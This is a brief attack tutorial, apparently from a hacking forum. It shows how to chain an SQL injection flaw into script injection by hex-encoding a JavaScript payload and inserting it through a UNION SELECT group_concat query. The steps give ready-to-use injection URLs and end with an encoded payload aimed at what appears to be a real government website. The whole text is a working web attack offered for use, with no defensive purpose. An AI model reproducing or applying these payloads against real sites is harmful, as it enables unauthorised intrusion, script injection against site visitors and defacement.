# Trick is based on Hexa Decimal Encoding.
[0x01] You got SQLi vulnerability in website
http://www.vulnerable.com/index.php?id=560
[0x02] Next count the columns. You got 5 columns and column 3 is
vulnerable.
[0x03] Next encode your JavaScript to HexaDecimal value.
Eg. <script>alert("Ajith 'n Ajmal")</script> 's hexa decimal value is
3c7363726970743e616c6572742822416a69746820276e20416a6d616c22293c2f7363726970743e
[0x04] Insert the hexa decimal value into group_concat function.
That is now use URL
www.vulnerable.com/index.php?id=560+UNION+SELECT+1,2,group_concat(0xhexadecimalvalue),4,5
Eg. http://www.commerce.gov.pk/ptmaview.php?ID=-32%20union%20select%201,2,3,group_concat%280x3c7363726970743e616c65727428224a756e6f5f6f6b796f277320426c6f6722293c2f7363726970743e%29,5,6,7,8,9,10,11,12,13,14